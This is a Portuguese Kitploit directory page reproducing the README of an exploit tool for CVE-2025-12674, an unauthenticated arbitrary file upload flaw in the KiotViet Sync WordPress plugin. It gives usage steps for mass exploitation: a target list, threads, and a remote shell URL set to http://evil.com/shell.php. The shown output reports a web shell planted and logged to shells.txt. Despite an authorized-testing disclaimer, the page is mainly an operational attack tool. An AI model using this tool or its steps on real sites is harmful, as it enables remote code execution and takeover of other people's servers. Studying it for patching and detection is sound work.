Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-12674 — KiotViet Sync <= 1.8.5 - Upload Arbitrário de Arquivos Não Autenticado | Kitploit
Ferramentas/GitHubGitHub/nxploited/cve-2025-12674
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de Penetração
GitHubnxploited/cve-2025-12674

CVE-2025-12674

KiotViet Sync <= 1.8.5 - Upload Arbitrário de Arquivos Não Autenticado

Ver Repositório
21há 8 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-12674

KiotViet Sync <= 1.8.5 - Upload Arbitrário de Arquivos Não Autenticado

🐚 KiotViet Sync <= 1.8.5 - Upload Arbitrário de Arquivos Não Autenticado


📝 Descrição

O plugin KiotViet Sync para WordPress (versões até e incluindo 1.8.5) é vulnerável a uploads arbitrários de arquivos, devido à falta de validação do tipo de arquivo na função create_media().
Essa vulnerabilidade permite que atacantes não autenticados façam upload de arquivos arbitrários para o servidor, o que pode levar à execução remota de código.

  • CVE: CVE-2025-12674
  • CVSS: 9.8 (Crítico)

🚀 Uso

  1. Clone este repositório ou baixe o script.

  2. Prepare seus alvos:
    Coloque um alvo por linha em um arquivo chamado list.txt.

root@kitploit:~
example.com
site2.com
http://site3.com
  • Execute o script de exploração:
    O nome do script é:

    root@kitploit:~
    CVE-2025-12674.py
    
    root@kitploit:~
    python3 CVE-2025-12674.py
    
  • Quando solicitado, insira suas opções:

    root@kitploit:~
    Enter targets file name (default: list.txt): list.txt
    Enter number of threads (default: 10): 
    Enter REMOTE SHELL URL (direct link): http://evil.com/shell.php
    ╭──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
    │ Loaded 1 targets. Threads: 10.                                                                                           │
    ╰──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
    ╭──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
    │ http://nxk.ddev.site                                                                                                     │
    │ Trying KiotViet exploit...                                                                                               │
    ╰──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
    ╔══════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════╗
    ║ ✔ Shell uploaded!                                                                                                        ║
    ║ Check here:                                                                                                              ║
    ║ http://nxk.ddev.site/wp-content/uploads/2026/01/                                                                         ║
    ║                                                                                                                          ║
    ╚══════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════╝
               Summary           
                                 
      Metric              Value  
     ─────────────────────────── 
      Total attempts          1  
      Successful shells       1  
      Failed attempts         0  
    
    • O diretório de saída para o shell enviado não mostra o nome do arquivo (pois ele é gerado dinamicamente).

    📂 Saída

    • Todos os caminhos de shell bem-sucedidos são salvos em shells.txt.
    • Cópias de backup da saída são feitas automaticamente com carimbos de data/hora.

    ⚠️ Aviso Legal

    Este script é fornecido apenas para fins educacionais e de testes de segurança autorizados.
    O uso não autorizado contra sistemas que você não possui ou para os quais não tem permissão explícita para testar é ilegal e antiético.
    O autor não se responsabiliza por uso indevido ou por qualquer dano causado.


    👤 Autor

    Nxploited (Khaled Alenazi)

    Baixar ferramenta